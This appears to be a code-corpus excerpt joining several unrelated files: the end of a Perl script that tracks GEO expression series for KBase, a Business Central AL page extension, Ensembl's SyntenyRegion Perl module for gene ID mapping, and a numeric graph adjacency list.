my ($gse_id,$kbase_id,$result,$messages,$sample_ids) = split('\t',trim($gse_result_line));
if ($current_gse_id ne $gse_id)
{
print GSE_RESULTS_FILE $gse_result_line;
}
else
{
$old_messages = $messages;
}
}
#add new version of series to the results file.
if ($old_messages)
{
if ($warning_messages)
{
$warning_messages .= "___" . $old_messages;
}
else
{
$warning_messages = $old_messages;
}
}
print GSE_RESULTS_FILE $current_gse_id . "\t" . $series_id . "\t".$result."\t".$warning_messages."\t".
join(",",sort(keys(%sample_ids_in_series)))."\n";
close (GSE_RESULTS_FILE);
}
else
{
#means brand new series and can append to series geo results file.
#GRAB NEW SERIES KB ID
#print "\nIN ELSE : Brand new series\n";
#Next two lines for testing
# my $series_prefix = "kb|series_test";
# $series_id = $series_prefix .".".$id_server->allocate_id_range( $series_prefix, 1 );
#Next three lines for real
my $series_prefix = "kb|series";
my $temp_id_hash_ref;
my $id_counter_try = 0;
while (! defined $temp_id_hash_ref)
{
eval
{
$temp_id_hash_ref = $id_server->register_ids($series_prefix,"GEO",[$gse_object_ref->{'gseID'}]);
};
if ($@)
{
my $msg = $@;
if ($id_counter_try < 20 && $msg =~ /500\s+Internal\s+Server\s+Error/i)
{
print "Retrying ID server call.\n";
$id_counter_try++;
sleep 1;
}
else
{
print "ID server error ($id_counter_try retries): $msg\n";
print "ID server call: $series_prefix, GEO, ".$gse_object_ref->{'gseID'}." \n ";
die "ID server failed.";
}
}
}
$series_id = $temp_id_hash_ref->{$gse_object_ref->{'gseID'}};
#resolve result
my $result = "Full Success";
if ($passing_gsm_count == 0)
{
return "0 - $current_gse_id had no passing GSMs, but should not have reached this error \n";
}
if ($failing_gsm_count > 0)
{
$result = "Partial Success";
}
my @gse_warnings = @{$gse_object_ref->{'gseWarnings'}};
my $warning_messages = join("___",@gse_warnings);
open (GSE_RESULTS_FILE, ">>".$gse_results_file) or return "0 - Unable to make/append to $gse_results_file \n";
print GSE_RESULTS_FILE $current_gse_id . "\t" . $series_id . "\t".$result."\t".$warning_messages."\t".
join(",",sort(keys(%sample_ids_in_series)))."\n";
close (GSE_RESULTS_FILE);
}
my @gse_sample_ids = sort(keys(%sample_ids_in_series));
my %genome_sample_ids_hash; #key genome id =>[sample_ids]
foreach my $temp_sample_id (sort(keys(%sample_ids_in_series)))
{
push(@{$genome_sample_ids_hash{$sample_ids_in_series{$temp_sample_id}}},$temp_sample_id);
}
#BUILD UP SERIES OBJECT and WRITE OUT SERIES OBJECT
my $series_object_ref = {"id"=>$series_id,
"source_id"=>$gse_object_ref->{'gseID'},
"genome_expression_sample_ids_map"=>\%genome_sample_ids_hash,
"external_source_date"=>$gse_object_ref->{'gseSubmissionDate'}};
if (exists($gse_object_ref->{'gseTitle'}) && ($gse_object_ref->{'gseTitle'} ne ""))
{
$series_object_ref->{"title"} = $gse_object_ref->{'gseTitle'};
}
if (exists($gse_object_ref->{'gseDesign'}) && ($gse_object_ref->{'gseDesign'} ne ""))
{
$series_object_ref->{"design"} = $gse_object_ref->{'gseDesign'};
}
if (exists($gse_object_ref->{'gsePubMedID'}) && ($gse_object_ref->{'gsePubMedID'} ne ""))
{
$series_object_ref->{"publication_id"} = $gse_object_ref->{'gsePubMedID'};
}
if (exists($gse_object_ref->{'gseSummary'}) && ($gse_object_ref->{'gseSummary'} ne ""))
{
$series_object_ref->{"summary"} = $gse_object_ref->{'gseSummary'};
}
foreach my $temp_sample_id (sort(keys(%sample_ids_in_series)))
{
add_series_ids_to_samples($typed_objects_directory,$temp_sample_id,$series_id);
}
#Write out object
#CREATE JSON OBJECT FILE
my $temp_series_file_name = $series_id;
$temp_series_file_name =~ s/kb\|//;
my $series_file_name = $typed_objects_directory."/".$temp_series_file_name;
open(SERIES_FILE, ">".$series_file_name) or return "0 - Unable to make to $series_file_name \n";
print SERIES_FILE to_json($series_object_ref);
close(SERIES_FILE);
}
return "1";
}
sub get_processed_gse_hash
{
my $gse_results_file = shift;
#returns a hash key gse_id => value kb|series.#
my %return_hash;
if (-e $gse_results_file)
{
#THIS FILE HAS 5 columns (tab delimited)(only 3 are brought back for this hash)
#the first column is the GSE_ID
#the second column is the KBase Series ID (if it exists)
#the third column is the upload result (3 possible values "Full Success","Partial Success"(some of GSMs passed, but not all),"Failure"
#the fourth column is the warning and error messages (separated by "___", 3 underscores)
#the fifth column is comma separated list of ids for the samples that the series contains.
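        #Illustrative row (tab separated; the ids below are made-up examples):
        # GSE7159\tkb|series.102\tFull Success\t\tkb|sample.500,kb|sample.501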
open (GSE_RESULTS,$gse_results_file) or return "0 - Unable to open $gse_results_file , it was supposed to exist";
my @gse_results_lines = (<GSE_RESULTS>);
foreach my $gse_result_line (@gse_results_lines)
{
my ($gse_id,$kbase_id,$result,$messages,$sample_ids) = split('\t',trim($gse_result_line));
if (($result ne "Failure") && (trim($kbase_id) ne '') && (trim($gse_id) ne ''))
{
$return_hash{$gse_id}{"id"} = trim($kbase_id);
}
$return_hash{$gse_id}{"result"} = trim($result);
$return_hash{$gse_id}{"sample_ids"} = trim($sample_ids);
}
close(GSE_RESULTS);
}
return %return_hash;
}
sub get_processed_gpl_hash
{
my $gpl_results_file = shift;
#returns a hash key gpl_id => value kb|platform.#
my %return_hash;
if (-e $gpl_results_file)
{
#THIS FILE HAS 2 columns (tab delimited)
#the first column is the GPL_ID
#the second column is the KBase Platform ID (if it exists)
open (GPL_RESULTS,$gpl_results_file) or return "0 - Unable to open $gpl_results_file , it was supposed to exist";
my @gpl_results_lines = (<GPL_RESULTS>);
foreach my $gpl_result_line (@gpl_results_lines)
{
my ($gpl_id,$kbase_id) = split('\t',trim($gpl_result_line));
if ((trim($kbase_id) ne '') && (trim($gpl_id) ne ''))
{
$return_hash{$gpl_id} = trim($kbase_id);
}
}
close(GPL_RESULTS);
}
return %return_hash;
}
sub get_processed_gsm_hash
{
my $gsm_results_file = shift;
#returns a hash key gsm_id => {genome => {data_quality_level => value kb|sample}}.#
my %return_hash;
if (-e $gsm_results_file)
{
#THIS FILE HAS 5 columns (tab delimited)(only 4 are brought back for this hash)
#the first column is the GSM_ID
#the second column is the Genome (kbase genome id)
#the third column is the DataQualityLevel (currently 3 possible int values -
# "1" for kbase pipeline processed data, "2" for seq blat mapped geo data, "3" for synonym mapped geo data
#the fourth column is the KBase Sample ID (if it exists)
#the fifth column is the warning and error messages (separated by "___", 3 underscores)
open (GSM_RESULTS,$gsm_results_file) or return "0 - Unable to open $gsm_results_file , it was supposed to exist";
my @gsm_results_lines = (<GSM_RESULTS>);
foreach my $gsm_result_line (@gsm_results_lines)
{
my ($gsm_id,$genome_id, $dql, $kbase_id,$messages) = split('\t',trim($gsm_result_line));
if ((trim($kbase_id) ne '') && (trim($gsm_id) ne '') && (trim($genome_id) ne '') && (trim($dql) ne ''))
{
$return_hash{$gsm_id}{$genome_id}{$dql} = trim($kbase_id);
}
}
close(GSM_RESULTS);
}
return %return_hash;
}
sub create_sample_genome_hash
{
my $gsm_results_file = shift;
#returns a hash key sample_id => genome
my %return_hash;
if (-e $gsm_results_file)
{
#THIS FILE HAS 5 columns (tab delimited)(only 4 are brought back for this hash)
#the first column is the GSM_ID
#the second column is the Genome (kbase genome id)
#the third column is the DataQualityLevel (currently 3 possible int values -
# "1" for kbase pipeline processed data, "2" for seq blat mapped geo data, "3" for synonym mapped geo data
#the fourth column is the KBase Sample ID (if it exists)
#the fifth column is the warning and error messages (separated by "___", 3 underscores)
open (GSM_RESULTS,$gsm_results_file) or return "0 - Unable to open $gsm_results_file , it was supposed to exist";
my @gsm_results_lines = (<GSM_RESULTS>);
foreach my $gsm_result_line (@gsm_results_lines)
{
my ($gsm_id,$genome_id, $dql, $kbase_id,$messages) = split('\t',trim($gsm_result_line));
if ((trim($kbase_id) ne '') && (trim($genome_id) ne ''))
{
$return_hash{trim($kbase_id)}=trim($genome_id);
}
}
close(GSM_RESULTS);
}
return %return_hash;
}
sub add_series_ids_to_samples
{
my $typed_objects_directory = shift;
my $sample_id = shift;
my $series_id = shift;
my %kb_series_ids;
$kb_series_ids{$series_id} = 1;
my $temp_sample_file_name = $sample_id;
$temp_sample_file_name =~ s/kb\|//;
my $sample_file_name = $typed_objects_directory."/".$temp_sample_file_name;
open (JSON_FILE,$sample_file_name) or die "0 - Unable to open $sample_file_name, it was supposed to exist";
my ($json_result,@temp_array)= (<JSON_FILE>);
close(JSON_FILE);
my $perl_object = from_json($json_result);
if ($perl_object->{"expression_series_ids"})
{
my @old_series_ids = @{$perl_object->{"expression_series_ids"}};
foreach my $old_series_id (@old_series_ids)
{
$kb_series_ids{$old_series_id} = 1;
}
}
my @new_series_ids = sort(keys(%kb_series_ids));
$perl_object->{"expression_series_ids"} = \@new_series_ids;
open(SAMPLE_FILE, ">".$sample_file_name) or return "0 - Unable to make to $sample_file_name \n";
print SAMPLE_FILE to_json($perl_object);
close(SAMPLE_FILE);
return 1;
}
1;
| 41.455993 | 173 | 0.600407 |
73e5137fe1859205da527500c7f7f6b9d1ddd9c3 | 1,075 | al | Perl | Apps/CZ/CoreLocalizationPack/app/Src/PageExtensions/ServiceQuote.PageExt.al | bjarkihall/ALAppExtensions | d8243d27e0280dec6e079ab9f1e838f9768c208c | [ "MIT" ] | 1 | 2021-08-16T18:14:49.000Z | 2021-08-16T18:14:49.000Z | Apps/CZ/CoreLocalizationPack/app/Src/PageExtensions/ServiceQuote.PageExt.al | bjarkihall/ALAppExtensions | d8243d27e0280dec6e079ab9f1e838f9768c208c | [ "MIT" ] | null | null | null | Apps/CZ/CoreLocalizationPack/app/Src/PageExtensions/ServiceQuote.PageExt.al | bjarkihall/ALAppExtensions | d8243d27e0280dec6e079ab9f1e838f9768c208c | [ "MIT" ] | 1 | 2021-02-09T10:23:09.000Z | 2021-02-09T10:23:09.000Z |
pageextension 11761 "Service Quote CZL" extends "Service Quote"
{
layout
{
addafter("VAT Registration No.")
{
field("Registration No. CZL"; Rec."Registration No. CZL")
{
ApplicationArea = Basic, Suite;
ToolTip = 'Specifies the registration number of customer.';
}
field("Tax Registration No. CZL"; Rec."Tax Registration No. CZL")
{
ApplicationArea = Basic, Suite;
ToolTip = 'Specifies the secondary VAT registration number for the customer.';
Importance = Additional;
}
}
addafter("Area")
{
field("EU 3-Party Intermed. Role CZL"; Rec."EU 3-Party Intermed. Role CZL")
{
ApplicationArea = Basic, Suite;
ToolTip = 'Specifies when the service header will use European Union third-party intermediate trade rules. This option complies with VAT accounting standards for EU third-party trade.';
}
}
}
}
| 37.068966 | 201 | 0.554419 |
edb68f3f35113a86adcce82a98dda3e633396fb5 | 14,925 | pm | Perl | modules/Bio/EnsEMBL/IdMapping/SyntenyRegion.pm | Anacode/ensembl | d3cfe97706ed1d38ee6b561198dd592c9f4ea2ee | [ "Apache-2.0" ] | null | null | null | modules/Bio/EnsEMBL/IdMapping/SyntenyRegion.pm | Anacode/ensembl | d3cfe97706ed1d38ee6b561198dd592c9f4ea2ee | [ "Apache-2.0" ] | null | null | null | modules/Bio/EnsEMBL/IdMapping/SyntenyRegion.pm | Anacode/ensembl | d3cfe97706ed1d38ee6b561198dd592c9f4ea2ee | [ "Apache-2.0" ] | null | null | null |
=head1 LICENSE
Copyright [1999-2013] Wellcome Trust Sanger Institute and the EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=cut
=head1 CONTACT
Please email comments or questions to the public Ensembl
developers list at <dev@ensembl.org>.
Questions may also be sent to the Ensembl help desk at
<helpdesk@ensembl.org>.
=cut
=head1 NAME
Bio::EnsEMBL::IdMapping::SyntenyRegion - object representing syntenic regions
=head1 SYNOPSIS
# create a new SyntenyRegion from a source and a target gene
my $sr = Bio::EnsEMBL::IdMapping::SyntenyRegion->new_fast( [
$source_gene->start, $source_gene->end,
$source_gene->strand, $source_gene->seq_region_name,
$target_gene->start, $target_gene->end,
$target_gene->strand, $target_gene->seq_region_name,
$entry->score,
] );
# merge with another SyntenyRegion
my $merged_sr = $sr->merge($sr1);
# score a gene pair against this SyntenyRegion
my $score =
$sr->score_location_relationship( $source_gene1, $target_gene1 );
=head1 DESCRIPTION
This object represents a synteny between a source and a target location.
SyntenyRegions are built from mapped genes, and their score is
defined as the score of the gene mapping. For merged SyntenyRegions,
scores are combined.
=head1 METHODS
new_fast
source_start
source_end
source_strand
source_seq_region_name
target_start
target_end
target_strand
target_seq_region_name
score
merge
stretch
score_location_relationship
to_string
=cut
package Bio::EnsEMBL::IdMapping::SyntenyRegion;
use strict;
use warnings;
no warnings 'uninitialized';
use Bio::EnsEMBL::Utils::Exception qw(throw warning);
=head2 new_fast
Arg[1] : Arrayref $array_ref - the arrayref to bless into the
SyntenyRegion object
  Example     : my $sr = Bio::EnsEMBL::IdMapping::SyntenyRegion->new_fast([
                  $source_gene->start,  $source_gene->end,
                  $source_gene->strand, $source_gene->seq_region_name,
                  $target_gene->start,  $target_gene->end,
                  $target_gene->strand, $target_gene->seq_region_name,
                  $score,
                ]);
Description : Constructor. On instantiation, source and target regions are
reverse complemented so that source is always on forward strand.
Return type : a Bio::EnsEMBL::IdMapping::SyntenyRegion object
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub new_fast {
my $class = shift;
my $array_ref = shift;
# reverse complement source and target so that source is always on forward
# strand; this will make merging and other comparison operations easier
# at later stages
if ($array_ref->[2] == -1) {
$array_ref->[2] = 1;
$array_ref->[6] = -1 * $array_ref->[6];
}
return bless $array_ref, $class;
}
=head2 source_start
Arg[1] : (optional) Int - source location start coordinate
Description : Getter/setter for source location start coordinate.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub source_start {
my $self = shift;
$self->[0] = shift if (@_);
return $self->[0];
}
=head2 source_end
Arg[1] : (optional) Int - source location end coordinate
Description : Getter/setter for source location end coordinate.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub source_end {
my $self = shift;
$self->[1] = shift if (@_);
return $self->[1];
}
=head2 source_strand
Arg[1] : (optional) Int - source location strand
Description : Getter/setter for source location strand.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub source_strand {
my $self = shift;
$self->[2] = shift if (@_);
return $self->[2];
}
=head2 source_seq_region_name
Arg[1] : (optional) String - source location seq_region name
Description : Getter/setter for source location seq_region name.
Return type : String
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub source_seq_region_name {
my $self = shift;
$self->[3] = shift if (@_);
return $self->[3];
}
=head2 target_start
Arg[1] : (optional) Int - target location start coordinate
Description : Getter/setter for target location start coordinate.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub target_start {
my $self = shift;
$self->[4] = shift if (@_);
return $self->[4];
}
=head2 target_end
Arg[1] : (optional) Int - target location end coordinate
Description : Getter/setter for target location end coordinate.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub target_end {
my $self = shift;
$self->[5] = shift if (@_);
return $self->[5];
}
=head2 target_strand
Arg[1] : (optional) Int - target location strand
Description : Getter/setter for target location strand.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub target_strand {
my $self = shift;
$self->[6] = shift if (@_);
return $self->[6];
}
=head2 target_seq_region_name
Arg[1] : (optional) String - target location seq_region name
Description : Getter/setter for target location seq_region name.
Return type : String
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub target_seq_region_name {
my $self = shift;
$self->[7] = shift if (@_);
return $self->[7];
}
=head2 score
Arg[1] : (optional) Float - score
Description : Getter/setter for the score between source and target location.
Return type : Int
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub score {
my $self = shift;
$self->[8] = shift if (@_);
return $self->[8];
}
=head2 merge
Arg[1] : Bio::EnsEMBL::IdMapping::SyntenyRegion $sr - another
SyntenyRegion
Example : $merged_sr = $sr->merge($other_sr);
Description : Merges two overlapping SyntenyRegions if they meet certain
criteria (see documentation in the code for details). Score is
calculated as a combined distance score. If the two
                SyntenyRegions aren't mergeable, this method returns 0.
  Return type : Bio::EnsEMBL::IdMapping::SyntenyRegion or 0
Exceptions : warns on bad scores
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
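# A rough worked example of the distance score computed below (illustrative numbers):
# if the other region starts 1000 bp further along the source and 900 bp further
# along the target, then dist = 100, d1 = 100/1000 = 0.1, d2 = 100/900 ~ 0.11,
# so dist_score = 1 - 0.1 - 0.11 ~ 0.79; that is above the 0.5 cutoff, and the
# merged score becomes 0.79 * (score1 + score2)/2.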
sub merge {
my ($self, $sr) = @_;
# must be on same seq_region
if ($self->source_seq_region_name ne $sr->source_seq_region_name or
$self->target_seq_region_name ne $sr->target_seq_region_name) {
return 0;
}
# target must be on same strand
return 0 unless ($self->target_strand == $sr->target_strand);
# find the distance of source and target pair and compare
my $source_dist = $sr->source_start - $self->source_start;
my $target_dist;
if ($self->target_strand == 1) {
$target_dist = $sr->target_start - $self->target_start;
} else {
$target_dist = $self->target_end - $sr->target_end;
}
# prevent division by zero error
if ($source_dist == 0 or $target_dist == 0) {
warn("WARNING: source_dist ($source_dist) and/or target_dist ($target_dist) is zero.\n");
return 0;
}
# calculate a distance score
my $dist = $source_dist - $target_dist;
$dist = -$dist if ($dist < 0);
my $d1 = $dist/$source_dist;
$d1 = -$d1 if ($d1 < 0);
my $d2 = $dist/$target_dist;
$d2 = -$d2 if ($d2 < 0);
my $dist_score = 1 - $d1 - $d2;
# distance score must be more than 50%
return 0 if ($dist_score < 0.5);
my $new_score = $dist_score * ($sr->score + $self->score)/2;
if ($new_score > 1) {
warn("WARNING: Bad merge score: $new_score\n");
}
# extend SyntenyRegion to cover both sources and targets, set merged score
# and return
if ($sr->source_start < $self->source_start) {
$self->source_start($sr->source_start);
}
if ($sr->source_end > $self->source_end) {
$self->source_end($sr->source_end);
}
if ($sr->target_start < $self->target_start) {
$self->target_start($sr->target_start);
}
if ($sr->target_end > $self->target_end) {
$self->target_end($sr->target_end);
}
$self->score($new_score);
return $self;
}
=head2 stretch
Arg[1] : Float $factor - stretching factor
Example : $stretched_sr = $sr->stretch(2);
Description : Extends this SyntenyRegion to span a $factor * $score more area.
Return type : Bio::EnsEMBL::IdMapping::SyntenyRegion
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
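# A rough worked example (illustrative numbers): a region covering source
# 1000-2000 (length 1001) with score 0.5 and $factor = 0.2 is widened by
# int(1001 * 0.2 * 0.5) = 100 on each side, i.e. it then covers 900-2100;
# the target span is widened by the analogous amount computed from its own length.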
sub stretch {
my ($self, $factor) = @_;
my $source_adjust = int(($self->source_end - $self->source_start + 1) *
$factor * $self->score);
$self->source_start($self->source_start - $source_adjust);
$self->source_end($self->source_end + $source_adjust);
#warn sprintf(" sss %d %d %d\n", $source_adjust, $self->source_start,
# $self->source_end);
my $target_adjust = int(($self->target_end - $self->target_start + 1) *
$factor * $self->score);
$self->target_start($self->target_start - $target_adjust);
$self->target_end($self->target_end + $target_adjust);
return $self;
}
=head2 score_location_relationship
Arg[1] : Bio::EnsEMBL::IdMapping::TinyGene $source_gene - source gene
Arg[2] : Bio::EnsEMBL::IdMapping::TinyGene $target_gene - target gene
Example : my $score = $sr->score_location_relationship($source_gene,
$target_gene);
Description : This function calculates how well the given source location
interpolates on given target location inside this SyntenyRegion.
Scoring is done the following way: Source and target location
                are normalized with respect to this Region's source and target.
                Source range will then be somewhere close to 0.0-1.0 and target
                range anything around that.
                The extent of the covered area between source and target range
                is a measurement of how well they agree (a smaller extent is
                better). The extent (actually 2*extent) is reduced by the size
                of the regions. This will result in 0.0 if they overlap
                perfectly and bigger values if they don't.
                This is subtracted from 1.0 to give the score. The score is
                likely to be below zero, but is cut off at 0.0.
Finally, the score is multiplied with the score of the synteny
itself.
Return type : Float
Exceptions : warns if score out of range
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
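# A rough worked example (illustrative numbers): for a SyntenyRegion with score 0.8,
# a source gene that normalises to 0.4-0.6 and a target gene that normalises to
# 0.5-0.7 give added_range = 0.7 - 0.4 = 0.3, so the returned score is
# 0.8 * (1 - (2*0.3 - 0.7 - 0.6 + 0.5 + 0.4)) = 0.8 * 0.8 = 0.64;
# a perfectly overlapping pair would keep the full 0.8.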
sub score_location_relationship {
my ($self, $source_gene, $target_gene) = @_;
# must be on same seq_region
if (($self->source_seq_region_name ne $source_gene->seq_region_name) or
($self->target_seq_region_name ne $target_gene->seq_region_name)) {
return 0;
}
# strand relationship must be the same (use logical XOR to find out)
if (($self->source_strand == $source_gene->strand) xor
($self->target_strand == $target_gene->strand)) {
return 0;
}
# normalise source location
my $source_rel_start = ($source_gene->start - $self->source_start) /
($self->source_end - $self->source_start + 1);
my $source_rel_end = ($source_gene->end - $self->source_start + 1) /
($self->source_end - $self->source_start + 1);
#warn " aaa ".$self->to_string."\n";
#warn sprintf(" bbb %.6f %.6f\n", $source_rel_start, $source_rel_end);
# cut off if the source location is completely outside
return 0 if ($source_rel_start > 1.1 or $source_rel_end < -0.1);
# normalise target location
my ($target_rel_start, $target_rel_end);
my $t_length = $self->target_end - $self->target_start + 1;
if ($self->target_strand == 1) {
$target_rel_start = ($target_gene->start - $self->target_start) / $t_length;
$target_rel_end = ($target_gene->end - $self->target_start + 1) / $t_length;
} else {
$target_rel_start = ($self->target_end - $target_gene->end) / $t_length;
$target_rel_end = ($self->target_end - $target_gene->start + 1) / $t_length;
}
my $added_range = (($target_rel_end > $source_rel_end) ? $target_rel_end :
$source_rel_end) -
(($target_rel_start < $source_rel_start) ? $target_rel_start :
$source_rel_start);
my $score = $self->score * (1 - (2 * $added_range - $target_rel_end -
$source_rel_end + $target_rel_start + $source_rel_start));
#warn " ccc ".sprintf("%.6f:%.6f:%.6f:%.6f:%.6f\n", $added_range,
# $source_rel_start, $source_rel_end, $target_rel_start, $target_rel_end);
$score = 0 if ($score < 0);
# sanity check
if ($score > 1) {
warn "Out of range score ($score) for ".$source_gene->id.":".
$target_gene->id."\n";
}
return $score;
}
=head2 to_string
Example : print LOG $sr->to_string, "\n";
Description : Returns a string representation of the SyntenyRegion object.
Useful for debugging and logging.
Return type : String
Exceptions : none
Caller : Bio::EnsEMBL::IdMapping::SyntenyFramework
Status : At Risk
: under development
=cut
sub to_string {
my $self = shift;
return sprintf("%s:%s-%s:%s %s:%s-%s:%s %.6f",
$self->source_seq_region_name,
$self->source_start,
$self->source_end,
$self->source_strand,
$self->target_seq_region_name,
$self->target_start,
$self->target_end,
$self->target_strand,
$self->score
);
}
1;
| 27.741636 | 100 | 0.653333 |
ed22f3b9c9eb457ba7c62d91acbec9fec94cf294 | 6,624 | al | Perl | benchmark/benchmarks/FASP-benchmarks/data/small-world-2/smallworld2-0744-40-360-1438.al | krzysg/FaspHeuristic | 1929c40e3fbc49e68b04acfc5522539a18758031 | [ "MIT" ] | null | null | null | benchmark/benchmarks/FASP-benchmarks/data/small-world-2/smallworld2-0744-40-360-1438.al | krzysg/FaspHeuristic | 1929c40e3fbc49e68b04acfc5522539a18758031 | [ "MIT" ] | null | null | null | benchmark/benchmarks/FASP-benchmarks/data/small-world-2/smallworld2-0744-40-360-1438.al | krzysg/FaspHeuristic | 1929c40e3fbc49e68b04acfc5522539a18758031 | [ "MIT" ] | null | null | null |
1 7 57 172 242 265
3 56 77 85 134 135 355
4 49 163 165 204 209 255
5 120 145
6 76 100 178 250 264
7 1 242
8 28 94 116 243 260 288
9 102 268 326 347
10 89 250
11 108 130 157
12 10 15 21 74 94 108 222 336
13 59 84 195 227 274
14 154 192 239 359
15 10 60 91 277
16 1 121 324
17 158 230 326 329
18 23 75 157 169
19 36 73 116 158 221 267
20 50 93 218
21 47 75 182 205 242 339
22 209 268
23 18 72 254
24 97 139 253 323
25 63 176 334
26 148 260 312
27 4 8 43 62 136 237 283
28 189 197 288
29 168 262 319
30 114 195 213 229 231 236
31 111 171 275
32 236 259 336 358
33 10 113 149 250 331
34 6 127
35 276 298 337
36 16 222 229 282 310 350
37 10 159 212 225 343
38 87 125 144 157
39 30 42 110 325
40 94 123 243
41 17 168 256 281 304
42 212 347
43 57 103 132 292 299 337 359
44 61 82 166 181 187
45 39 154 188 193 201 266
46 70 191 227
47 3 161 266 270
48 72 298
50 52 182 285
51 81 89 188
52 48 97 129 176 208 256 355
53 41 202 330 356
54 59 78 233 320 328
55 44 206
56 92 352
57 7 136
58 47 200 204 262 333
59 26 294 359
60 10 29 62 202 244
61 14 137 137 161 285 308 350
62 33 41 42 229 267 289 300 300 356
63 27 94 127 150 333
64 103 116 273 353
65 129 180 193 229
66 127
67 87 165 171 187 307
68 20 254
69 86 217 260 297
70 24 106 283 333
71 100 132 164 233
72 30 109 115 235 253
73 90 106 181 231 277 293
74 216
75 21 92 241 298 350
76 97 213 214 217 253 341 354
77 19 195 296 343 360
78 25 212
79 74 129 271
80 92 98 293 318
81 18 65 124 308
82 79 90 169 220 291 311
83 64
84 128 218
85 11 76 100 135 141 157 217 232
86 115 132 192 207 211 272 299
87 22 96 169 211 303 328
88 133 321
89 59 85 216 284
90 5 79 124 322
91 155 184 328
92 120 136 151 268 293 302
93 87 101 153 156 180
94 119 182 220
95 26 70 123 165 280
96 34 79 166 186 191 198
97 47 60 230 245 264 358
98 208 243 293
99 3 162 240 292 301
100 85 102 107 151 220 318 324
101 216 237 315 348
102 280 328
103 138 235 340
104 26 30 51 111
105 39 191 207
106 19 73 158 255 275 287
107 85
108 175 247
109 15 243 285
110 40 139 255 304
111 87
112 55 103 206 213 222 235 291 340
113 108 114 118 284 294
114 107 215
115 70 74 297
116 233 242
117 18 32 99
118 125 149 232
119 13 48 101 117
120 11 47 179
121 16 57 90 125 139
122 18 46 169 338
123 83 95 133
124 44 338
125 86 207
126 101 161 205 319 344
127 4 34 75
128 26 161 168
129 73 88 287
130 196 265 321
131 35 124 226 338
132 34 77 322
133 29 37 90 95 193 313 325
134 106 249 267
135 85
136 17 27 89 98 100 308
137 77 81 121 279 360
138 10 31 39 122 201 248
139 104 125 143 232 323
140 72 167 217
141 123 294
142 130
144 99 137 301 317 325 355
145 100 127 136 273 351
146 278
147 1 100 113 278 342 343
148 6 174 203 309 317
149 32 50 172
150 40 63 190 220
151 176 357
152 85 225
153 70 135 170 217 264 325
154 133 283 307
155 48 204 206 214 310 313
156 109 280 286 288
157 113 216
158 1 50 149 185 252 257
159 37 140 289
160 5 36 211 318 337 358
161 22 216 217
162 11 259
163 10 16 17 41 42 62 182
164 16 146 172 172 274 298 349
165 203 277
166 46 65 77
167 173 196 291
168 48 98 132 244
169 122 247 310
170 159 286
171 31 165 200 228 266
172 38 139 164 218 267 358
173 89 140 213 271
174 31 169
176 19 71 129 260 353
177 96 97 102 105 220
178 34 45 313 354
179 24 25 83 171 231 233
180 120 148 189 243
181 37 147 172
182 1 20 101 213 237 319
183 91 116 137 237
184 69 91 164
185 34 38 87 162 188 199 216
186 14 107 146 168 181
187 10 128 129 169 212
188 129 137 177 228 292 330
189 93 116 180 347
190 153 216 300 314
191 149 227
192 70
193 154 201
194 65 94 124 327 340
195 60 60 62 335 339
196 54 142 204
197 15 185 243 245 273 285 293
198 197 331 357
199 64 103 174 285
200 31 194
201 149 191 266
202 15 180 222
203 110 283 305 346
204 143 208 264 355
206 20 67 182 291 301 333
207 253
208 5 31 50 168 300 355 358 360
209 21 125 165 178
210 165 178 305
211 105 258 273 296
212 56 235 272 342 343
213 116 173 177 199 226 238
214 113 119 186 223
215 82 200 212 220
216 40 78 81 83 334
217 153 186 230 328 336
218 178 210 217 234 330
219 10 328 345
220 7 143 215 249
221 158 228 281
222 148 202 265
223 11 141
224 66 76 148 256 257
225 8 227 236
226 105 156 187
227 36 88 98 130 134 160 191 286 348
228 26 96 188
229 62 83
230 28 148 157
231 24 30 213
232 56 135 173 186 285
233 116 235 327
234 51 55 217 219
235 9 68 112 147 277 306
236 5 113 166 223
237 182 248 280
238 8 117 183 274 291
239 61 306 346
240 1 66 102 121 221 260
241 66 89 140 236 257
242 9 199 326 357
243 98 120 163 180 296
244 107 114 168 218 350
245 111 208 210 311
246 53 92 161 321
247 132 257 280
248 39 135
249 55 85 96 211 288 293 303
250 26 264 311 332
251 47 80 173 213
252 117 142 204 244 324
253 69 127 222 234 324
254 14 271 356
255 10 177
256 269
257 22 30 62 141 249
258 17 174 305 327
259 284 335
260 20 180 185 203 279
261 156 191 263 280
262 97 204
263 49 159 192 359
264 34 77 97 99
265 60 91 133
266 183 199 256 325 334
267 40 64 279
268 90 297 303
269 62 183 240 311
270 114 215 220
271 18 103 180 248
272 33 40 80 134 168 301 335
273 172 293
274 96 191 238 340
275 13 84 122 137 225
276 247 261 268 287
277 49 103 254
278 88 147 256 297
279 207
280 71 132 285
281 41 95 254 257 329
282 88 115 131 187 306
283 144 193 250 290 330
284 38 64 84 113 291
285 90 107 150 214
286 83 174 227 276 333
287 1 41 124 252 328
